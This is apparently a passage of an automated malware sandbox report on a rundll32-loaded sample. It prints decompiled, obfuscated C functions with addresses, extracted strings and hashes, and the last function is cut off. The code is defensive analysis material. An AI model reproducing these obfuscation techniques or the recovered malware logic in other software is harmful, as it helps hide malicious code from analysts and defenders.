Instruction Fuzzy Hash: 5D0233725083409FE364CF25C889A5BBBE1BBC4358F148A1EF5E996260D7B5C90ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 00439106, Relevance: 12.8, Strings: 10, Instructions: 328
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00439106(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* __ecx;
				void* _t286;
				signed int _t335;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				void* _t354;
				signed int* _t397;
				signed int* _t401;
				void* _t404;

				_t398 = _a12;
				_t397 = _a16;
				_push(_t397);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00442550(_t286);
				_v72 = 0x2367;
				_t401 =  &(( &_v172)[6]);
				_v72 = _v72 | 0x097ad610;
				_v72 = _v72 ^ 0x097ae8e2;
				_t354 = 0x1dc5535c;
				_v92 = 0x56dc;
				_v92 = _v92 + 0xce73;
				_v92 = _v92 ^ 0x000174de;
				_v108 = 0x5b94;
				_v108 = _v108 ^ 0x203ddd03;
				_v108 = _v108 << 0xa;
				_v108 = _v108 ^ 0xf61a093d;
				_v140 = 0x3ec5;
				_t342 = 0x2d;
				_v140 = _v140 / _t342;
				_v140 = _v140 + 0xffff0d7c;
				_t343 = 0x54;
				_v140 = _v140 * 0x56;
				_v140 = _v140 ^ 0xffae99ec;
				_v100 = 0x56eb;
				_v100 = _v100 + 0xbf92;
				_v100 = _v100 + 0xffffb004;
				_v100 = _v100 ^ 0x0000e62d;
				_v124 = 0xb6af;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 / _t343;
				_v124 = _v124 ^ 0x0000233e;
				_v120 = 0xde2;
				_t54 =  &_v120; // 0xde2
				_t344 = 0x4c;
				_v120 =  *_t54 / _t344;
				_v120 = _v120 * 0x3f;
				_v120 = _v120 ^ 0x00006eff;
				_v104 = 0xa720;
				_v104 = _v104 * 0x69;
				_v104 = _v104 + 0x1686;
				_v104 = _v104 ^ 0x0044923c;
				_v112 = 0xb3bf;
				_v112 = _v112 >> 1;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 ^ 0x00005d19;
				_v96 = 0x2a95;
				_v96 = _v96 >> 6;
				_v96 = _v96 + 0xbf11;
				_v96 = _v96 ^ 0x0000bd99;
				_v148 = 0xc1fd;
				_v148 = _v148 << 0xc;
				_v148 = _v148 * 0x31;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x42da2451;
				_v160 = 0xd54a;
				_t345 = 0x17;
				_v160 = _v160 / _t345;
				_v160 = _v160 | 0x2f8e477c;
				_v160 = _v160 + 0xffff9d16;
				_v160 = _v160 ^ 0x2f8dc8af;
				_v168 = 0x5d03;
				_v168 = _v168 + 0xffffafa9;
				_v168 = _v168 + 0xffff8780;
				_v168 = _v168 | 0x25100a61;
				_v168 = _v168 ^ 0xfffffc23;
				_v116 = 0x4d25;
				_t346 = 0x4a;
				_v116 = _v116 / _t346;
				_t347 = 0x45;
				_v116 = _v116 / _t347;
				_v116 = _v116 ^ 0x00001bc5;
				_v152 = 0xf56f;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 + 0xffff6840;
				_v152 = _v152 | 0xadc68f8a;
				_v152 = _v152 ^ 0xffffbd08;
				_v172 = 0xb7ce;
				_v172 = _v172 >> 9;
				_v172 = _v172 >> 4;
				_v172 = _v172 << 0xd;
				_v172 = _v172 ^ 0x0000b2e5;
				_v80 = 0x57d2;
				_v80 = _v80 ^ 0xaa637a5b;
				_v80 = _v80 ^ 0xaa6340a6;
				_v156 = 0xb744;
				_v156 = _v156 + 0x63ef;
				_t348 = 0x7c;
				_v156 = _v156 / _t348;
				_v156 = _v156 ^ 0xd73448d2;
				_v156 = _v156 ^ 0xd7344e9f;
				_v132 = 0x174e;
				_t349 = 0x78;
				_v132 = _v132 * 0x65;
				_v132 = _v132 | 0x3b954933;
				_v132 = _v132 ^ 0xbecd0e21;
				_v132 = _v132 ^ 0x85504ce6;
				_v164 = 0x7af9;
				_v164 = _v164 << 9;
				_v164 = _v164 >> 7;
				_v164 = _v164 * 0x41;
				_v164 = _v164 ^ 0x007cf7ff;
				_v136 = 0x7571;
				_v136 = _v136 + 0xffff8152;
				_v136 = _v136 | 0x8539ecc8;
				_v136 = _v136 / _t349;
				_v136 = _v136 ^ 0x022226c3;
				_v88 = 0xe259;
				_v88 = _v88 * 0x74;
				_v88 = _v88 ^ 0x0066854f;
				_v144 = 0x1b27;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x66;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x00005892;
				_v76 = 0x4fda;
				_v76 = _v76 ^ 0xefbec303;
				_v76 = _v76 ^ 0xefbe9eae;
				_v84 = 0x12ec;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x0012dc80;
				_v128 = 0x576c;
				_t350 = 0x3e;
				_v128 = _v128 / _t350;
				_t351 = 0x79;
				_v128 = _v128 / _t351;
				_v128 = _v128 + 0x759e;
				_v128 = _v128 ^ 0x000075a0;
				goto L1;
				do {
					while(1) {
						L1:
						_t404 = _t354 - 0x1cceac70;
						if(_t404 > 0) {
							break;
						}
						if(_t404 == 0) {
							E0043F834( *((intOrPtr*)(_t398 + 0xc)), _v160,  &_v68, _v168);
							_t401 =  &(_t401[2]);
							_t354 = 0x326fdce7;
							continue;
						} else {
							if(_t354 == 0x828a2c) {
								E0043F834( *((intOrPtr*)(_t398 + 0x14)), _v172,  &_v68, _v80);
								_t401 =  &(_t401[2]);
								_t354 = 0x10364e2a;
								continue;
							} else {
								if(_t354 == 0xc083f5a) {
									E0043FEE3(_t397,  &_v68, _v108, _v140, _v100, _v124);
									_t401 =  &(_t401[4]);
									_t354 = 0x223ac297;
									continue;
								} else {
									if(_t354 == 0x10364e2a) {
										E0043BAD2(_v156, _v132, __eflags, _t398 + 0x18,  &_v68, _v164);
										_t401 =  &(_t401[3]);
										_t354 = 0x1e572357;
										continue;
									} else {
										if(_t354 == 0x17d7bd79) {
											E0043F834( *((intOrPtr*)(_t398 + 8)), _v96,  &_v68, _v148);
											_t401 =  &(_t401[2]);
											_t354 = 0x1cceac70;
											continue;
										} else {
											if(_t354 == 0x18be4013) {
												_push(_t354);
												_t335 = E004354FB(_t397[1]);
												 *_t397 = _t335;
												__eflags = _t335;
												if(__eflags != 0) {
													_t354 = 0xc083f5a;
													continue;
												}
											} else {
												if(_t354 != 0x19774c23) {
													goto L28;
												} else {
													E0043F834( *((intOrPtr*)(_t398 + 0x28)), _v76,  &_v68, _v84);
												}
											}
										}
									}
								}
							}
						}
						L10:
						return 0 |  *_t397 != 0x00000000;
					}
					__eflags = _t354 - 0x1dc5535c;
					if(_t354 == 0x1dc5535c) {
						_t354 = 0x210e94e8;
						 *_t397 =  *_t397 & 0x00000000;
						__eflags =  *_t397;
						_t397[1] = _v128;
						goto L28;
					} else {
						__eflags = _t354 - 0x1e572357;
						if(__eflags == 0) {
							E0043BAD2(_v136, _v88, __eflags, _t398 + 0x20,  &_v68, _v144);
							_t401 =  &(_t401[3]);
							_t354 = 0x19774c23;
							goto L1;
						} else {
							__eflags = _t354 - 0x210e94e8;
							if(_t354 == 0x210e94e8) {
								_t397[1] = E0044DBC4(_t398);
								_t354 = 0x18be4013;
								goto L1;
							} else {
								__eflags = _t354 - 0x223ac297;
								if(__eflags == 0) {
									E0043BAD2(_v120, _v104, __eflags, _t398,  &_v68, _v112);
									_t401 =  &(_t401[3]);
									_t354 = 0x17d7bd79;
									goto L1;
								} else {
									__eflags = _t354 - 0x326fdce7;
									if(_t354 != 0x326fdce7) {
										goto L28;
									} else {
										E0043F834( *((intOrPtr*)(_t398 + 0x10)), _v116,  &_v68, _v152);
										_t401 =  &(_t401[2]);
										_t354 = 0x828a2c;
										goto L1;
									}
								}
							}
						}
					}
					goto L10;
					L28:
					__eflags = _t354 - 0x3b76f47b;
				} while (__eflags != 0);
				goto L10;
			}

0x0043910f
0x00439117
0x0043911e
0x0043911f
0x00439120
0x00439127
0x0043912e
0x00439130
0x00439135
0x00439140
0x00439143
0x0043914d
0x00439155
0x0043915a
0x00439162
0x0043916a
0x00439172
0x0043917a
0x00439182
0x00439187
0x0043918f
0x0043919d
0x004391a2
0x004391a8
0x004391b5
0x004391b8
0x004391bc
0x004391c4
0x004391cc
0x004391d4
0x004391dc
0x004391e4
0x004391ec
0x004391f9
0x004391fd
0x00439205
0x0043920d
0x00439211
0x00439214
0x0043921d
0x00439221
0x00439229
0x00439236
0x0043923a
0x00439242
0x0043924a
0x00439252
0x00439256
0x0043925b
0x00439263
0x0043926b
0x00439270
0x00439278
0x00439280
0x00439288
0x00439292
0x00439296
0x0043929b
0x004392a5
0x004392b3
0x004392b8
0x004392be
0x004392c6
0x004392ce
0x004392d6
0x004392de
0x004392e6
0x004392ee
0x004392f6
0x004392fe
0x0043930a
0x0043930f
0x00439319
0x0043931e
0x00439324
0x0043932c
0x00439334
0x00439339
0x00439341
0x00439349
0x00439351
0x00439359
0x0043935e
0x00439363
0x00439368
0x00439370
0x00439378
0x00439380
0x00439388
0x00439390
0x0043939c
0x004393a1
0x004393a7
0x004393af
0x004393b7
0x004393c4
0x004393c5
0x004393c9
0x004393d1
0x004393d9
0x004393e1
0x004393e9
0x004393ee
0x004393f8
0x004393fc
0x00439404
0x0043940c
0x00439414
0x00439422
0x00439426
0x0043942e
0x0043943b
0x0043943f
0x00439447
0x0043944f
0x00439459
0x0043945d
0x00439462
0x0043946a
0x00439474
0x00439481
0x00439489
0x00439491
0x00439496
0x0043949e
0x004394ac
0x004394b1
0x004394bb
0x004394c3
0x004394c7
0x004394cf
0x004394cf
0x004394d7
0x004394d7
0x004394d7
0x004394d7
0x004394d9
0x00000000
0x00000000
0x004394df
0x0043960a
0x0043960f
0x00439612
0x00000000
0x004394e5
0x004394eb
0x004395e8
0x004395ed
0x004395f0
0x00000000
0x004394f1
0x004394f3
0x004395c6
0x004395cb
0x004395ce
0x00000000
0x004394f9
0x004394ff
0x0043959e
0x004395a3
0x004395a6
0x00000000
0x00439505
0x0043950b
0x0043957a
0x0043957f
0x00439582
0x00000000
0x0043950d
0x00439513
0x00439556
0x00439557
0x0043955c
0x0043955f
0x00439561
0x00439563
0x00000000
0x00439563
0x00439515
0x0043951b
0x00000000
0x00439521
0x00439531
0x00439536
0x0043951b
0x00439513
0x0043950b
0x004394ff
0x004394f3
0x004394eb
0x00439539
0x0043954a
0x0043954a
0x0043961c
0x00439622
0x004396d1
0x004396d6
0x004396d6
0x004396d9
0x00000000
0x00439628
0x00439628
0x0043962e
0x004396bb
0x004396c0
0x004396c3
0x00000000
0x00439630
0x00439630
0x00439636
0x00439699
0x0043969c
0x00000000
0x00439638
0x00439638
0x0043963e
0x00439680
0x00439685
0x00439688
0x00000000
0x00439640
0x00439640
0x00439646
0x00000000
0x0043964c
0x0043965c
0x00439661
0x00439664
0x00000000
0x00439664
0x00439646
0x0043963e
0x00439636
0x0043962e
0x00000000
0x004396dc
0x004396dc
0x004396dc
0x00000000

Strings

-, xrefs: 004391DC
c, xrefs: 00439390
qu, xrefs: 00439404
>#, xrefs: 004391FD
z, xrefs: 0043914D
g#, xrefs: 00439135
%M, xrefs: 004392FE
lW, xrefs: 0043949E
Y, xrefs: 0043942E
>#, xrefs: 0043920D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %M$-$>#$Y$g#$lW$qu$>#$c$z
API String ID: 0-2374964813
Opcode ID: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
Instruction ID: 2edbfba1616fd423810750ee8d0e107423e941fd03e18a7c88ac676ccba3999e
Opcode Fuzzy Hash: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
Instruction Fuzzy Hash: 10E141B1509741DFD328CF21C58991FBBE1ABD8708F109A1EF299862A0D3B9D909CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00434D90, Relevance: 12.8, Strings: 10, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00434D90() {
				char _v524;
				unsigned int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t364;
				intOrPtr _t367;
				void* _t372;
				char _t382;
				void* _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int* _t425;

				_t425 =  &_v700;
				_v664 = 0x9fa1;
				_v664 = _v664 >> 0xf;
				_t372 = 0x3b39200;
				_v664 = _v664 + 0x495e;
				_v664 = _v664 * 0x17;
				_t412 = 0;
				_v664 = _v664 ^ 0x00069788;
				_v604 = 0xceb5;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x00000106;
				_v624 = 0xb514;
				_v624 = _v624 + 0xffffa476;
				_t413 = 0x15;
				_v624 = _v624 * 0x46;
				_v624 = _v624 ^ 0x00187a00;
				_v668 = 0x7309;
				_v668 = _v668 * 0x23;
				_v668 = _v668 >> 3;
				_v668 = _v668 ^ 0x5792a418;
				_v668 = _v668 ^ 0x57934680;
				_v676 = 0x9940;
				_v676 = _v676 + 0xffff3182;
				_v676 = _v676 / _t413;
				_t414 = 0x57;
				_v676 = _v676 / _t414;
				_v676 = _v676 ^ 0x0023e38f;
				_v700 = 0xa5bb;
				_v700 = _v700 | 0x2eb34f51;
				_t415 = 0x69;
				_v700 = _v700 / _t415;
				_v700 = _v700 + 0xffff1835;
				_v700 = _v700 ^ 0x00708bbe;
				_v640 = 0x8462;
				_t416 = 0x31;
				_v640 = _v640 / _t416;
				_v640 = _v640 | 0xf5b8cac2;
				_v640 = _v640 ^ 0xf5b8b775;
				_v644 = 0x4c0;
				_v644 = _v644 + 0xfffff031;
				_v644 = _v644 << 0xf;
				_v644 = _v644 ^ 0xfa78cc6a;
				_v576 = 0x47f3;
				_v576 = _v576 | 0x1c217342;
				_v576 = _v576 ^ 0x1c214363;
				_v600 = 0x6198;
				_v600 = _v600 << 5;
				_v600 = _v600 ^ 0x000c7289;
				_v632 = 0xa609;
				_v632 = _v632 + 0xaff1;
				_v632 = _v632 + 0xffff061b;
				_v632 = _v632 ^ 0x0000381f;
				_v584 = 0x236b;
				_v584 = _v584 | 0x1d93d101;
				_v584 = _v584 ^ 0x1d9382a6;
				_v580 = 0xb44f;
				_v580 = _v580 ^ 0x84ec8f50;
				_v580 = _v580 ^ 0x84ec3805;
				_v592 = 0x2849;
				_v592 = _v592 >> 8;
				_v592 = _v592 ^ 0x00006208;
				_v684 = 0xffa5;
				_v684 = _v684 >> 4;
				_t417 = 0xb;
				_v684 = _v684 * 0x1c;
				_v684 = _v684 << 0xc;
				_v684 = _v684 ^ 0x1bf5e695;
				_v692 = 0x7e89;
				_v692 = _v692 + 0x2efa;
				_v692 = _v692 / _t417;
				_v692 = _v692 + 0x2a18;
				_v692 = _v692 ^ 0x000064a1;
				_v596 = 0xa252;
				_t418 = 0x59;
				_v596 = _v596 * 9;
				_v596 = _v596 ^ 0x0005d303;
				_v680 = 0xbeb4;
				_v680 = _v680 >> 2;
				_v680 = _v680 + 0x1673;
				_v680 = _v680 + 0x7062;
				_v680 = _v680 ^ 0x0000a375;
				_v648 = 0x506f;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 / _t418;
				_v648 = _v648 ^ 0x00002d61;
				_v656 = 0xa4c4;
				_t419 = 0x3f;
				_v656 = _v656 / _t419;
				_v656 = _v656 ^ 0xb08d55bb;
				_v656 = _v656 + 0x38bc;
				_v656 = _v656 ^ 0xb08d947f;
				_v688 = 0x4e3f;
				_v688 = _v688 >> 8;
				_v688 = _v688 >> 4;
				_t420 = 0x52;
				_v688 = _v688 / _t420;
				_v688 = _v688 ^ 0x00004d88;
				_v672 = 0x8701;
				_v672 = _v672 >> 9;
				_t421 = 0x24;
				_v672 = _v672 * 7;
				_v672 = _v672 >> 0xe;
				_v672 = _v672 ^ 0x000031cf;
				_v636 = 0x4a3c;
				_v636 = _v636 >> 0xa;
				_v636 = _v636 / _t421;
				_v636 = _v636 ^ 0x00005769;
				_v612 = 0x66c7;
				_v612 = _v612 << 0xc;
				_v612 = _v612 ^ 0x7aee3ef9;
				_v612 = _v612 ^ 0x7c821959;
				_v628 = 0x44bc;
				_v628 = _v628 << 0xb;
				_v628 = _v628 << 4;
				_v628 = _v628 ^ 0x225e6a59;
				_v696 = 0xf2f9;
				_t422 = 0x36;
				_v696 = _v696 / _t422;
				_v696 = _v696 << 4;
				_v696 = _v696 << 7;
				_v696 = _v696 ^ 0x0023cdd9;
				_v652 = 0xfa07;
				_v652 = _v652 ^ 0xfb6d8595;
				_v652 = _v652 | 0xb1ef9277;
				_v652 = _v652 * 0x2f;
				_v652 = _v652 ^ 0x410fad88;
				_v608 = 0x638e;
				_v608 = _v608 * 0x64;
				_v608 = _v608 ^ 0x0026a181;
				_v660 = 0xd0ef;
				_v660 = _v660 << 0xc;
				_v660 = _v660 + 0xdc19;
				_v660 = _v660 << 0xc;
				_v660 = _v660 ^ 0xfcc19d1e;
				_t371 = _v608;
				_v616 = 0x9e76;
				_v616 = _v616 + 0xffffc7b8;
				_v616 = _v616 + 0xb6c0;
				_v616 = _v616 ^ 0x000153b0;
				_v588 = 0xaa15;
				_v588 = _v588 >> 0x10;
				_v620 = 0x4821;
				_v620 = _v620 >> 0xb;
				_v620 = _v620 ^ 0xbb1b7ef2;
				_v620 = _v620 ^ 0xbb1b7ef8;
				do {
					while(_t372 != 0x3b39200) {
						if(_t372 == 0x724dd21) {
							E00444291(_v624, _v668,  &_v572, _v676);
							_t372 = 0x23ca7f5b;
							continue;
						} else {
							if(_t372 == 0x1549ba03) {
								_push(0x4312d8);
								_push(_v576);
								_push(_v644);
								E0043A4D7(__eflags, _v632, _v584, _v580, _v592, E00435DFC(_v700, _v640, __eflags),  *0x451088 + 0x254,  &_v524,  *0x451088 + 0x38);
								E00440D6D(_v684, _v692, _v596, _t356);
								_t425 =  &(_t425[0xd]);
								_t372 = 0x2c137c18;
								continue;
							} else {
								if(_t372 == 0x23ca7f5b) {
									_v572 = _v572 - E004347EB();
									_t372 = 0x1549ba03;
									asm("sbb [esp+0x94], edx");
									continue;
								} else {
									if(_t372 == 0x2c137c18) {
										_push(_t372);
										_t364 = E0044C0C8(_v664, _v604, _v680,  &_v524, _v648, _v656, 0, _v688, _t372, _v620, _v672);
										_t371 = _t364;
										_t425 =  &(_t425[0xa]);
										__eflags = _t364 - 0xffffffff;
										if(__eflags != 0) {
											_t372 = 0x32dad644;
											continue;
										}
									} else {
										if(_t372 == 0x2cffd5ae) {
											E0043F1ED(_v652, _v608, _v660, _v616, _t371);
										} else {
											if(_t372 != 0x32dad644) {
												goto L15;
											} else {
												_t382 = _v572;
												_t367 = _v568;
												_push(_t382);
												_v560 = _t367;
												_v552 = _t367;
												_v544 = _t367;
												_v536 = _t367;
												_v532 = _v588;
												_v564 = _t382;
												_v556 = _t382;
												_v548 = _t382;
												_v540 = _t382;
												E004441CA(_t371, _v636, _v612, _v628,  &_v564, _t382, _v696);
												_t425 =  &(_t425[6]);
												_t412 =  !=  ? 1 : _t412;
												_t372 = 0x2cffd5ae;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t372 = 0x724dd21;
					L15:
					__eflags = _t372 - 0x140d4499;
				} while (__eflags != 0);
				goto L18;
			}

0x00434d90
0x00434d96
0x00434da0
0x00434da5
0x00434daa
0x00434dbb
0x00434dbf
0x00434dc1
0x00434dc9
0x00434dd1
0x00434dd6
0x00434dde
0x00434de6
0x00434df5
0x00434df8
0x00434dfc
0x00434e04
0x00434e11
0x00434e15
0x00434e1a
0x00434e22
0x00434e2a
0x00434e32
0x00434e42
0x00434e4a
0x00434e4f
0x00434e55
0x00434e5d
0x00434e65
0x00434e71
0x00434e76
0x00434e7c
0x00434e84
0x00434e8c
0x00434e98
0x00434e9b
0x00434e9f
0x00434ea7
0x00434eaf
0x00434eb7
0x00434ebf
0x00434ec4
0x00434ecc
0x00434ed7
0x00434ee2
0x00434eed
0x00434ef5
0x00434efa
0x00434f02
0x00434f0a
0x00434f12
0x00434f1a
0x00434f22
0x00434f2d
0x00434f38
0x00434f43
0x00434f4e
0x00434f59
0x00434f64
0x00434f6c
0x00434f73
0x00434f7b
0x00434f83
0x00434f8f
0x00434f92
0x00434f96
0x00434f9b
0x00434fa3
0x00434fab
0x00434fbb
0x00434fbf
0x00434fc7
0x00434fcf
0x00434fdc
0x00434fdf
0x00434fe3
0x00434feb
0x00434ff3
0x00434ff8
0x00435000
0x00435008
0x00435010
0x00435018
0x00435025
0x00435029
0x00435031
0x0043503d
0x00435042
0x00435048
0x00435050
0x00435058
0x00435060
0x00435068
0x0043506d
0x00435076
0x0043507b
0x00435081
0x00435089
0x00435091
0x0043509b
0x0043509c
0x004350a0
0x004350a5
0x004350ad
0x004350b5
0x004350c0
0x004350c4
0x004350cc
0x004350d4
0x004350d9
0x004350e1
0x004350e9
0x004350f1
0x004350f6
0x004350fb
0x00435103
0x00435118
0x0043511b
0x0043511f
0x00435124
0x00435129
0x00435131
0x00435139
0x00435141
0x0043514e
0x00435152
0x0043515a
0x00435167
0x0043516b
0x00435173
0x0043517b
0x00435180
0x00435188
0x0043518d
0x00435195
0x00435199
0x004351a1
0x004351a9
0x004351b1
0x004351b9
0x004351c4
0x004351da
0x004351e2
0x004351e7
0x004351ef
0x004351f7
0x004351f7
0x00435205
0x004353d1
0x004353d8
0x00000000
0x0043520b
0x00435211
0x0043533a
0x0043533f
0x00435346
0x00435396
0x004353ab
0x004353b0
0x004353b3
0x00000000
0x00435217
0x0043521d
0x00435322
0x00435329
0x0043532e
0x00000000
0x00435223
0x00435229
0x004352d1
0x00435300
0x00435305
0x00435307
0x0043530a
0x0043530d
0x00435313
0x00000000
0x00435313
0x0043522f
0x00435235
0x00435403
0x0043523b
0x00435241
0x00000000
0x00435247
0x00435247
0x0043524e
0x00435255
0x00435256
0x0043525d
0x00435264
0x0043526b
0x0043527d
0x00435291
0x004352a0
0x004352a7
0x004352ae
0x004352b7
0x004352be
0x004352c4
0x004352c7
0x00000000
0x004352c7
0x00435241
0x00435235
0x00435229
0x0043521d
0x00435211
0x0043540b
0x00435417
0x00435417
0x004353e2
0x004353e4
0x004353e4
0x004353e4
0x00000000

Strings

I(, xrefs: 00434F64
Yj^", xrefs: 004350FB
?N, xrefs: 00435060
^I, xrefs: 00434DAA
!H, xrefs: 004351DA
s, xrefs: 00434E04
iW, xrefs: 004350C4
a-, xrefs: 00435029
k#, xrefs: 00434F22
bp, xrefs: 00435000

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
API String ID: 0-2383980949
Opcode ID: 5c954413499439a477521fb51fd53b1b912815a7beb093be7c1d52612a0cf69e
Instruction ID: 941ff0f0601a3c61fb2214fbdcce61863c7cea15099c059de147457b37d163a3
Opcode Fuzzy Hash: 5c954413499439a477521fb51fd53b1b912815a7beb093be7c1d52612a0cf69e
Instruction Fuzzy Hash: E0F13471508380DFE368CF25C54965BBBE1BBC8758F108A1EF1D9962A0C7B98949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00174304, Relevance: 12.8, Strings: 10, Instructions: 326COMMON

Download Yara Rule

Strings

s, xrefs: 00174378
?N, xrefs: 001745D4
!H, xrefs: 0017474E
^I, xrefs: 0017431E
iW, xrefs: 00174638
bp, xrefs: 00174574
I(, xrefs: 001744D8
k#, xrefs: 00174496
Yj^", xrefs: 0017466F
a-, xrefs: 0017459D

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
API String ID: 0-2383980949
Opcode ID: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
Instruction ID: e1e898123e10b4058e988009fde45999a8254239bedb5f9cb5c7665d08514dfd
Opcode Fuzzy Hash: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
Instruction Fuzzy Hash: A1F12271508380CFE368CF65C589A5BBBF1BBC9758F108A1DF19A962A0C7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0018819F, Relevance: 12.8, Strings: 10, Instructions: 310COMMON

Download Yara Rule

Strings

NN, xrefs: 0018856E
Y, xrefs: 001882D9
XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING, xrefs: 001887BE
$W^, xrefs: 001882A7
%n, xrefs: 0018832A
x, xrefs: 00188593
<_, xrefs: 0018849D
/3, xrefs: 00188388
~r, xrefs: 001885B0
?0, xrefs: 001884BB

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $W^$%n$/3$<_$?0$NN$XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING$~r$Y$x
API String ID: 0-79831239
Opcode ID: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
Instruction ID: 42dc462e092838fdf31f135b5a2e021887e109f65b21526f84b4f3e5aeaa36c9
Opcode Fuzzy Hash: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
Instruction Fuzzy Hash: 26F1337150C3809FD368DF65C44AA5BBBF1BBC5748F508A0CF19A962A0DBB58A09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0044D70B, Relevance: 12.8, Strings: 10, Instructions: 258
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0044D70B(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t250;
				intOrPtr _t253;
				intOrPtr* _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				void* _t272;
				void* _t301;
				intOrPtr* _t307;
				void* _t308;
				void* _t311;
				signed int* _t312;

				_t312 =  &_v96;
				_v16 = 0xfaeb;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x001f68fb;
				_v20 = 0x715d;
				_t311 = __edx;
				_t262 = __ecx;
				_t307 = 0;
				_t264 = 0x69;
				_v20 = _v20 / _t264;
				_v20 = _v20 ^ 0x00004d95;
				_t308 = 0x6d0b453;
				_v52 = 0xe4dc;
				_v52 = _v52 ^ 0xb66ed69d;
				_v52 = _v52 | 0x051c73ce;
				_v52 = _v52 ^ 0xb77e6da2;
				_v56 = 0xfea7;
				_v56 = _v56 | 0x2ac21b6d;
				_t265 = 0x28;
				_v56 = _v56 / _t265;
				_v56 = _v56 ^ 0x0111c769;
				_v40 = 0x7de3;
				_v40 = _v40 >> 0xc;
